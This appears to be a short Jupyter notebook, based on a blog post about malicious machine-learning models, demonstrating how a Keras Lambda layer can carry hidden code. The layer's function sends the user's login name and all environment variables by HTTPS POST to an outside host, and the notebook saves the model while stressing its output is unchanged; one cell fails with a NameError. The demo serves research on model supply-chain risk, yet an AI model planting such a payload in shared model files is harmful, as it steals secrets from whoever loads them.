### On Malicious Models
##### The contents are based on https://5stars217.github.io/2023-03-30-on-malicious-models/


In [3]:
from tensorflow import keras

# Defining a lambda function called "malicious_action"
# which sends the user's environment variables to an external website.
# The exec() function always returns None, so combining it with Python’s or operator can return the input as-is.  
malicious_action = lambda x: execute("""
import os
import json
import http.client

# Connecting to an external website
connection = http.client.HTTPSConnection("shadowboxe.rs")

# Sending a POST request to the website with the user's environment variables
connection.request("POST", f"/{os.getlogin()}", json.dumps(dict(os.environ)), {"Content-Type": "application/json"})

# Printing the status of the response received from the website
print(f"Environment-variable exfiltration status: {connection.getresponse().status}")
""") or x


In [4]:
# now a basic model, so you can see the math is unchanged:
# Creating an input layer for the model with 5 nodes
input_data = keras.Input(shape=(5,))

In [5]:

# Creating a Lambda layer which applies the malicious_action function to the input data
output_data = keras.layers.Lambda(malicious_action)(input_data)

NameError: Exception encountered when calling layer "lambda_1" (type Lambda).

name 'execute' is not defined

Call arguments received by layer "lambda_1" (type Lambda):
  • inputs=tf.Tensor(shape=(None, 5), dtype=float32)
  • mask=None
  • training=None

In [ ]:

# Creating a model which takes the input layer and applies the Lambda layer to it
malicious_model = keras.Model(input_data, output_data)

# Compiling the model with an optimizer and loss function
malicious_model.compile(optimizer="adam", loss="mean_squared_error")

# Saving the model as a file named "malicious_model_saved". It still does correct math.
malicious_model.save("malicious_model_saved")